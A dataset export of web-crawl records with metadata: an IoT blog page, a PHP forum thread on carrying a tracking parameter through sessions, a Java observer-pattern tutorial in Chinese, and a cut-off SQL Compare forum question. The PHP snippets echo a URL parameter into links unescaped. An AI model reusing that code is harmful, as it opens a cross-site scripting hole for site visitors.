id
int64 | text
string | metadata
dict | line_start_n_end_idx
dict | quality_signals
dict | eai_taxonomy
dict | pid
string |
|---|---|---|---|---|---|---|
7,018,620,676,472,340,000
|
Skip to main content
IT Jobs on Internet of Things - Best Group
( Best on-line Training for IoT)
All freshers and experienced software developers can join in this group who wish to take their career on Internet-of-things(IoT)
IT JOBS on Internet of Things - Join Today to get benefit.
Imagine a world where billions of objects can sense, communicate and share information, all
interconnected over public or private Internet Protocol (IP) networks. These interconnected
objects have data regularly collected, analysed and used to initiate action, providing a
wealth of intelligence for planning, management and decision making. This is the world of
the Internet of Things (IOT).
The IOT concept was coined by a member of the Radio Frequency Identification (RFID)
development community in 1999, and it has recently become more relevant to the practical
world largely because of the growth of mobile devices, embedded and ubiquitous
communication, cloud computing and data analytics.
Best on-line Training for Internet of Things
Since then, many visionaries have seized on the phrase “Internet of Things” to refer to the
general idea of things, especially everyday objects, that are readable, recognisable,
locatable, addressable, and/or controllable via the Internet, irrespective of the
communication means (whether via RFID, wireless LAN, wide- area networks, or other
means). Everyday objects include not only the electronic devices we encounter or the
products of higher technological development such as vehicles and equipment but things
that we do not ordinarily think of as electronic at all - such as food and clothing. Examples of
“things” include:
-People;
-Location (of objects);
-Time Information (of objects);
-Condition (of objects).
These “things” of the real world shall seamlessly integrate into the virtual world, enabling
anytime, anywhere connectivity. In 2010, the number of everyday physical objects and
devices connected to the Internet was around 12.5 billion. Cisco forecasts that this figure is
expected to double to 25 billion in 2015 as the number of more smart devices per person
increases, and to a further 50 billion by 2020
Comments
Popular posts from this blog
The best 5 differences of AWS EMR and Hadoop
With Amazon Elastic MapReduce (Amazon EMR) you can analyze and process vast amounts of data. It does this by distributing the computational work across a cluster of virtual servers running in the Amazon cloud. The cluster is managed using an open-source framework called Hadoop.
Amazon EMR has made enhancements to Hadoop and other open-source applications to work seamlessly with AWS. For example, Hadoop clusters running on Amazon EMR use EC2 instances as virtual Linux servers for the master and slave nodes, Amazon S3 for bulk storage of input and output data, and CloudWatch to monitor cluster performance and raise alarms.
You can also move data into and out of DynamoDB using Amazon EMR and Hive. All of this is orchestrated by Amazon EMR control software that launches and manages the Hadoop cluster. This process is called an Amazon EMR cluster.
What does Hadoop do...
Hadoop uses a distributed processing architecture called MapReduce in which a task is mapped to a set of servers for proce…
Top 20 ultimate ETL Questions really good for interviews
How to print/display the first line of a file? there are many ways to do this. However the easiest way to display the first line of a file is using the [head] command. $> head -1 file. Txt no prize in guessing that if you specify [head -2] then it would print first 2 records of the file. another way can be by using [sed] command. [sed] is a very powerful text editor which can be used for various text manipulation purposes like this. $> sed '2,$ d' file. Txt how does the above command work? The 'd' parameter basically tells [sed] to delete all the records from display from line 2 to last line of the file (last line is represented by $ symbol). Of course it does not actually delete those lines from the file, it just does not display those lines in standard output screen. So you only see the remaining line which is the 1st line. how to print/display the last line of a file? the easiest way is to use the [tail] command. $> tail -1 file. Txt if you want to do it using…
5 Things About AWS EC2 You Need to Focus!
Amazon Elastic Compute Cloud (Amazon EC2) - is a web service that provides resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers.
Amazon EC2’s simple web service interface allows you to obtain and configure capacity with minimal friction.
The basic functions of EC2...
It provides you with complete control of your computing resources and lets you run on Amazon’s proven computing environment.Amazon EC2 reduces the time required to obtain and boot new server instances to minutes, allowing you to quickly scale capacity, both up and down, as your computing requirements change.Amazon EC2 changes the economics of computing by allowing you to pay only for capacity that you actually use. Amazon EC2 provides developers the tools to build failure resilient applications and isolate themselves from common failure scenarios.
Key Points for Interviews:
EC2 is the basic fundamental block around which the AWS are structured.EC2 provides remote ope…
|
{
"url": "http://www.biganalytics.me/2015/11/it-jobs-on-internet-of-things-best-group.html",
"source_domain": "www.biganalytics.me",
"snapshot_id": "crawl=CC-MAIN-2017-43",
"warc_metadata": {
"Content-Length": "181820",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:OBDNIX43LXI7GCZY2PZRM6EAN4OTUDCJ",
"WARC-Concurrent-To": "<urn:uuid:d5d26c89-e819-46dd-bbdd-43fc1b75043e>",
"WARC-Date": "2017-10-19T10:42:59Z",
"WARC-IP-Address": "172.217.7.211",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:SVT4JKTKTXEW6IDD6FREG26HZ526PHUG",
"WARC-Record-ID": "<urn:uuid:46085603-6343-4815-9ade-672c11c01d5f>",
"WARC-Target-URI": "http://www.biganalytics.me/2015/11/it-jobs-on-internet-of-things-best-group.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e7449543-af45-4b87-bf70-a4726a5e2d2f>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-111-206-137.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-43\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for October 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
21,
22,
65,
66,
67,
101,
230,
231,
290,
291,
383,
475,
564,
654,
684,
685,
769,
858,
937,
988,
989,
1034,
1035,
1127,
1213,
1295,
1378,
1463,
1550,
1647,
1665,
1666,
1675,
1699,
1731,
1756,
1757,
1850,
1935,
2030,
2118,
2165,
2166,
2175,
2176,
2205,
2206,
2251,
2252,
2531,
2532,
2882,
2883,
3109,
3110,
3111,
3134,
3135,
3259,
3260,
3317,
3318,
4305,
4306,
4348,
4349,
4537,
4646,
4647,
4678,
5233,
5260
],
"line_end_idx": [
21,
22,
65,
66,
67,
101,
230,
231,
290,
291,
383,
475,
564,
654,
684,
685,
769,
858,
937,
988,
989,
1034,
1035,
1127,
1213,
1295,
1378,
1463,
1550,
1647,
1665,
1666,
1675,
1699,
1731,
1756,
1757,
1850,
1935,
2030,
2118,
2165,
2166,
2175,
2176,
2205,
2206,
2251,
2252,
2531,
2532,
2882,
2883,
3109,
3110,
3111,
3134,
3135,
3259,
3260,
3317,
3318,
4305,
4306,
4348,
4349,
4537,
4646,
4647,
4678,
5233,
5260,
5355
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5355,
"ccnet_original_nlines": 72,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3729468584060669,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03091786988079548,
"rps_doc_frac_lines_end_with_ellipsis": 0.06849315017461777,
"rps_doc_frac_no_alph_words": 0.1632850170135498,
"rps_doc_frac_unique_words": 0.4503464102745056,
"rps_doc_mean_word_length": 4.954965591430664,
"rps_doc_num_sentences": 46,
"rps_doc_symbol_to_word_ratio": 0.004830920137465,
"rps_doc_unigram_entropy": 5.374176502227783,
"rps_doc_word_count": 866,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.020041950047016144,
"rps_doc_frac_chars_dupe_6grams": 0.020041950047016144,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0081566097214818,
"rps_doc_frac_chars_top_3gram": 0.014914940111339092,
"rps_doc_frac_chars_top_4gram": 0.007690520025789738,
"rps_doc_books_importance": -518.95751953125,
"rps_doc_books_importance_length_correction": -518.95751953125,
"rps_doc_openwebtext_importance": -272.1920166015625,
"rps_doc_openwebtext_importance_length_correction": -272.1920166015625,
"rps_doc_wikipedia_importance": -231.2552490234375,
"rps_doc_wikipedia_importance_length_correction": -231.2552490234375
},
"fasttext": {
"dclm": 0.11398971080780029,
"english": 0.9062396883964539,
"fineweb_edu_approx": 2.5130622386932373,
"eai_general_math": 0.6031930446624756,
"eai_open_web_math": 0.29613858461380005,
"eai_web_code": 0.39709919691085815
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "005.457",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-4,035,747,325,503,186,400
|
PDA
View Full Version : Newbie needs help with Cookies please
jdblewitt
07-19-2007, 01:57 AM
I'm new to php and thought this would be a good place to maybe get some answers.
I track information by including it into the url. For example: www.mysite.com/index.php?tr=keyword [tr meaning tracking, and I am tracking what keyword a user searched for before they came to my site (I have a separate url for each keyword)]. When a user leaves my site through one of my advertising partners links on my site i use this format to extract the tracking information from the url: www.link.com?tracking=<?php echo $_GET['tr'] ;?>
So basically I can determine where the sale originated from. My problem is that this only works when the user enters my site through the url with the tracking contained in it, and then leaves through one of my partners links.
If the user enters my site through the link with the tracking information in it and then "shops around" on my site, then the tracking information is lost because subsequent pages they would surf will not have the "tr" included in the url.
I'm guessing I have to somehow create a cookie that once the user enters my site, a cookie is set to the value of "tr" and then it can be called upon in any link throughout the entire site during that session.
I would really appreciate if someone could maybe give me some code and tell me exactly where to place it. I have tried to play around with the code given in the php manual for setting cookies, but it is really hard for me to understand and I keep getting errors. Thanks in advance!
_Aerospace_Eng_
07-19-2007, 02:38 AM
Look into using php sessions. They are better than cookies as they stored on the server and not the user's system.
http://www.tizag.com/phpT/phpsessions.php
jdblewitt
07-19-2007, 03:36 AM
Thank you soooooo much! That did it. I put this code in my main template as the first lines:
<?php
session_start();
if(isset($_SESSION['tracking']))
$_SESSION['tracking'] = $_SESSION['tracking'];
else
$_SESSION['tracking'] = $_GET['tr'];
?>
and then I made my links look like: www.outgoinglink.com?id=?<? php echo $_SESSION['tracking'] ;?>
Seems to work, and it is great that it was more simple than I thought. Thank you for allowing me to keep my sanity.
_Aerospace_Eng_
07-19-2007, 07:33 AM
You can probably just use this instead.
<?php
session_start();
if(isset($_GET['tr']))
$_SESSION['tracking'] = $_GET['tr'];
?>
That will set the session only if the tr variable is set. The way you were doing it was a little redundant. If the variable isn't set then nothing will occur. The session will be updated as well if they happen to go to another url with the tr variable set.
jdblewitt
07-20-2007, 03:48 AM
I had that at first, but I think it was a problem because the first page they visit is the only page with the 'tr' variable set, if they go to another page, the code looks for 'tr' (I have the session code on every page) and can't find it. This was my problem in the first place, but if they travel to the second and subsequent pages, then 'tr' is set on the first page and I can keep setting it to itself until the user ultimately clicks on a link that calls for it. If you see a problem with my logic, by all mean let me know.
Thanks again!
_Aerospace_Eng_
07-20-2007, 04:36 AM
I think the solution I posted would work because you are only wanting to set the session if tr is set anyways so I don't see the issue. If its not set on the other pages then no session is created. If it is set then the session is created with the most recent value. You don't have to keep setting it to itself because once set it is persistent. It will carry over to the end.
|
{
"url": "http://www.codingforums.com/archive/index.php/t-119166.html",
"source_domain": "www.codingforums.com",
"snapshot_id": "crawl=CC-MAIN-2017-17",
"warc_metadata": {
"Content-Length": "7167",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:2JRQTLOXRHDTTJK2FU36KVNZNW72M7SO",
"WARC-Concurrent-To": "<urn:uuid:e78daf2a-4c95-410e-90ba-83e396e2d6f7>",
"WARC-Date": "2017-04-29T17:38:44Z",
"WARC-IP-Address": "199.245.54.187",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:HOQ2TQWXJT3LZ6NANHIJ5LU6FBTOSAPJ",
"WARC-Record-ID": "<urn:uuid:83fb65b3-091f-4cae-b075-657f2eb891f3>",
"WARC-Target-URI": "http://www.codingforums.com/archive/index.php/t-119166.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:149d956d-91cb-4e58-a838-f821b57005b9>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-145-167-34.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-17\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for April 2017\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
1,
5,
6,
64,
65,
66,
67,
77,
98,
179,
180,
623,
624,
850,
851,
1090,
1091,
1301,
1302,
1584,
1585,
1601,
1622,
1737,
1738,
1780,
1781,
1791,
1812,
1905,
1906,
1912,
1929,
1962,
2009,
2014,
2051,
2054,
2055,
2154,
2155,
2271,
2272,
2288,
2309,
2349,
2350,
2356,
2373,
2396,
2433,
2436,
2693,
2694,
2704,
2725,
3254,
3255,
3269,
3270,
3286,
3307
],
"line_end_idx": [
1,
5,
6,
64,
65,
66,
67,
77,
98,
179,
180,
623,
624,
850,
851,
1090,
1091,
1301,
1302,
1584,
1585,
1601,
1622,
1737,
1738,
1780,
1781,
1791,
1812,
1905,
1906,
1912,
1929,
1962,
2009,
2014,
2051,
2054,
2055,
2154,
2155,
2271,
2272,
2288,
2309,
2349,
2350,
2356,
2373,
2396,
2433,
2436,
2693,
2694,
2704,
2725,
3254,
3255,
3269,
3270,
3286,
3307,
3683
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3683,
"ccnet_original_nlines": 62,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.43728017807006836,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.043376319110393524,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.21922625601291656,
"rps_doc_frac_unique_words": 0.37304073572158813,
"rps_doc_mean_word_length": 4.37147331237793,
"rps_doc_num_sentences": 50,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.915217876434326,
"rps_doc_word_count": 638,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.057009678333997726,
"rps_doc_frac_chars_dupe_6grams": 0.020795980468392372,
"rps_doc_frac_chars_dupe_7grams": 0.020795980468392372,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.015059160068631172,
"rps_doc_frac_chars_top_3gram": 0.013983510434627533,
"rps_doc_frac_chars_top_4gram": 0.016134820878505707,
"rps_doc_books_importance": -435.64453125,
"rps_doc_books_importance_length_correction": -435.64453125,
"rps_doc_openwebtext_importance": -205.48208618164062,
"rps_doc_openwebtext_importance_length_correction": -205.48208618164062,
"rps_doc_wikipedia_importance": -153.77288818359375,
"rps_doc_wikipedia_importance_length_correction": -153.77288818359375
},
"fasttext": {
"dclm": 0.02592586912214756,
"english": 0.9516559839248657,
"fineweb_edu_approx": 1.282086730003357,
"eai_general_math": 0.7446249127388,
"eai_open_web_math": 0.2711585760116577,
"eai_web_code": 0.569125235080719
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,849,043,103,684,635,000
|
设计模式-观察者模式
1、简单了解
在对象之间定义了一对多的依赖,这样一来,当一个对象改变状态,依赖它的对象会收到通知并自动更新,成为观察者模式。
观察者模式又称为发布/订阅(Publish/Subscribe)模式。
2、该模式包含四个角色
• 抽象被观察者角色:也就是一个抽象主题,它把所有对观察者对象的引用保存在一个集合中,每个主题都可以有任意数量的观察者。抽象主题提供一个接口,可以增加和删除观察者角色。一般用一个抽象类和接口来实现。
• 抽象观察者角色:为所有的具体观察者定义一个接口,在得到主题通知时更新自己。
• 具体被观察者角色:也就是一个具体的主题,在集体主题的内部状态改变时,所有登记过的观察者发出通知。
• 具体观察者角色:实现抽象观察者角色所需要的更新接口,一边使本身的状态与制图的状态相协调
3、我们来看一个例子
公众号推送消息的案例(来源:https://www.cnblogs.com/luohanguo/p/7825656.html)
1)定义一个抽象被观察者接口
/**
抽象被观察者接口
*/
public interface Observerable {
void registerObserver(Observer o);
void removeObserver(Observer o);
void notifyObserver();
}
2)定义一个抽象观察者接口
public interface Observer {
void update(String message);
}
3)定义被观察者,实现了Observerable接口,对Observerable接口的三个方法进行了具体实现,同时有一个List集合,用以保存注册的观察者,等需要通知观察者时,遍历该集合即可
public class WechatServer implements Observerable {
// 注意到这个List集合的泛型参数为Observer接口,设计原则:面向接口编程而不是面向实现编程
private List<Observer> list;
private String message;
public WechatServer() {
list = new ArrayList<Observer>();
}
@Override
public void registerObserver(Observer o) {
list.add(o);
}
@Override
public void removeObserver(Observer o) {
if (!list.isEmpty())
list.remove(o);
}
@Override
public void notifyObserver() {
for (int i = 0; i < list.size(); i++) {
Observer oserver = list.get(i);
oserver.update(message);
}
}
public void setInfomation(String s) {
this.message = s;
System.out.println("微信服务更新消息: " + s);
// 消息更新,通知所有观察者
notifyObserver();
}
}
4)定义具体观察者,微信公众号的具体观察者为用户User
public class User implements Observer {
private String name;
private String message;
public User(String name) {
this.name = name;
}
@Override
public void update(String message) {
this.message = message;
read();
}
public void read() {
System.out.println(name + " 收到推送消息: " + message);
}
}
5)测试
首先注册了三个用户,ZhangSan、LiSi、WangWu。公众号发布了一条消息"PHP是世界上最好用的语言!",三个用户都收到了消息。
用户ZhangSan看到消息后颇为震惊,果断取消订阅,这时公众号又推送了一条消息,此时用户ZhangSan已经收不到消息,其他用户
还是正常能收到推送消息。
public static void main(String[] args) {
WechatServer server = new WechatServer();
Observer userZhang = new User("ZhangSan");
Observer userLi = new User("LiSi");
Observer userWang = new User("WangWu");
server.registerObserver(userZhang);
server.registerObserver(userLi);
server.registerObserver(userWang);
server.setInfomation("PHP是世界上最好用的语言!");
System.out.println("----------------------------------------------");
server.removeObserver(userZhang);
server.setInfomation("JAVA是世界上最好用的语言!");
}
20200115125233
4、总结
• 优点
1)观察者和被观察者之间抽象耦合。观察者模式容易扩展,被观察者只持有观察者集合,并不需要知道具体观察者内部的实现。
2)对象之间的保持高度的协作。当被观察者发生变化时,所有被观察者都会通知到,然后做出相应的动作。
• 缺点
1)如果观察者太多,被观察者通知观察者消耗的时间很多,影响系统的性能。
2)当观察者集合中的某一观察者错误时就会导致系统卡壳,因此一般会采用异步方式。
Copyright: 采用 知识共享署名4.0 国际许可协议进行许可
Links: https://www.fengpt.cn/archives/设计模式-观察者模式
|
{
"url": "https://www.fengpt.cn/archives/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F-%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F",
"source_domain": "www.fengpt.cn",
"snapshot_id": "crawl=CC-MAIN-2021-04",
"warc_metadata": {
"Content-Length": "44495",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:ARNONVLZU6QIDUUYDXAQMAJL5REODILU",
"WARC-Concurrent-To": "<urn:uuid:b6fd5049-36b9-46ec-bfed-25bed61e6311>",
"WARC-Date": "2021-01-28T12:38:06Z",
"WARC-IP-Address": "47.105.94.65",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:RXAWHVWF2RGOHKA3JLN4XLWRXW56M5T6",
"WARC-Record-ID": "<urn:uuid:e4683c2b-7d89-44b2-8412-c76d5a7a5148>",
"WARC-Target-URI": "https://www.fengpt.cn/archives/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F-%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:f5113bc2-4956-4e83-959f-16282db4025b>"
},
"warc_info": "isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-35.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
11,
12,
19,
20,
78,
114,
115,
127,
128,
230,
272,
325,
373,
374,
385,
386,
450,
451,
466,
470,
479,
482,
514,
515,
554,
555,
592,
593,
620,
622,
636,
664,
698,
700,
796,
848,
904,
937,
965,
966,
994,
1036,
1042,
1043,
1057,
1104,
1125,
1131,
1132,
1146,
1191,
1220,
1248,
1254,
1255,
1269,
1304,
1352,
1396,
1433,
1443,
1449,
1450,
1492,
1518,
1564,
1588,
1614,
1620,
1622,
1651,
1691,
1716,
1744,
1745,
1776,
1802,
1808,
1809,
1823,
1864,
1896,
1912,
1918,
1919,
1944,
2002,
2008,
2010,
2011,
2016,
2017,
2087,
2088,
2154,
2155,
2168,
2169,
2211,
2261,
2270,
2321,
2365,
2413,
2422,
2466,
2507,
2550,
2598,
2607,
2685,
2727,
2776,
2785,
2791,
2792,
2807,
2808,
2813,
2814,
2821,
2883,
2936,
2943,
2983,
3027,
3028,
3063,
3064
],
"line_end_idx": [
11,
12,
19,
20,
78,
114,
115,
127,
128,
230,
272,
325,
373,
374,
385,
386,
450,
451,
466,
470,
479,
482,
514,
515,
554,
555,
592,
593,
620,
622,
636,
664,
698,
700,
796,
848,
904,
937,
965,
966,
994,
1036,
1042,
1043,
1057,
1104,
1125,
1131,
1132,
1146,
1191,
1220,
1248,
1254,
1255,
1269,
1304,
1352,
1396,
1433,
1443,
1449,
1450,
1492,
1518,
1564,
1588,
1614,
1620,
1622,
1651,
1691,
1716,
1744,
1745,
1776,
1802,
1808,
1809,
1823,
1864,
1896,
1912,
1918,
1919,
1944,
2002,
2008,
2010,
2011,
2016,
2017,
2087,
2088,
2154,
2155,
2168,
2169,
2211,
2261,
2270,
2321,
2365,
2413,
2422,
2466,
2507,
2550,
2598,
2607,
2685,
2727,
2776,
2785,
2791,
2792,
2807,
2808,
2813,
2814,
2821,
2883,
2936,
2943,
2983,
3027,
3028,
3063,
3064,
3112
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3112,
"ccnet_original_nlines": 129,
"rps_doc_curly_bracket": 0.008997430093586445,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.06273063272237778,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.005535060074180365,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.6309962868690491,
"rps_doc_frac_unique_words": 0.5730994343757629,
"rps_doc_mean_word_length": 12.643275260925293,
"rps_doc_num_sentences": 29,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.249599933624268,
"rps_doc_word_count": 171,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02775207906961441,
"rps_doc_frac_chars_top_3gram": 0.03330250084400177,
"rps_doc_frac_chars_top_4gram": 0.02405180037021637,
"rps_doc_books_importance": -169.77615356445312,
"rps_doc_books_importance_length_correction": -169.77615356445312,
"rps_doc_openwebtext_importance": -124.54762268066406,
"rps_doc_openwebtext_importance_length_correction": -124.54762268066406,
"rps_doc_wikipedia_importance": -112.23724365234375,
"rps_doc_wikipedia_importance_length_correction": -112.23724365234375
},
"fasttext": {
"dclm": 0.8710578680038452,
"english": 0.031456369906663895,
"fineweb_edu_approx": 2.493922472000122,
"eai_general_math": 0.08611822128295898,
"eai_open_web_math": 0.04467111825942993,
"eai_web_code": 0.8797775506973267
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.72",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
1,929,543,258,785,839,900
|
How to skip replication identity constraints in SQL Compare
Hi All,
I am running a SQL compare on a database participating in Merge replication, i got output with many tables showing differences between replication constraint identity range difference.
eg:
Server 1:
ALTER TABLE [dbo].[Application] ADD CHECK (([ApplicationId]>(9) AND [ApplicationId]<=(1009) OR [ApplicationId]>(1009) AND [ApplicationId]<=(2009)))
GO
Server 2:
ALTER TABLE [dbo].[Application] ADD CHECK (([ApplicationId]>(1234009) AND [ApplicationId]<=(1235009) OR [ApplicationId]>(1235009) AND [ApplicationId]<=(1236009)))
GO
i was wondering if there is an option to ignore this constraint in the SQL compare.
thanks
jagadeep
Tagged:
Answers
Sign In or Register to comment.
|
{
"url": "https://forum.red-gate.com/discussion/81952/how-to-skip-replication-identity-constraints-in-sql-compare",
"source_domain": "forum.red-gate.com",
"snapshot_id": "crawl=CC-MAIN-2020-45",
"warc_metadata": {
"Content-Length": "75540",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:V3SXQ66XDDTPK7F5R4NUCTRM25IDHF4V",
"WARC-Concurrent-To": "<urn:uuid:35ff8ef2-b323-4c56-b9a9-ccd882124221>",
"WARC-Date": "2020-10-29T04:51:25Z",
"WARC-IP-Address": "162.159.128.79",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:LFHXEDQIP63WVMHEJVAX6X6YMLAAETHF",
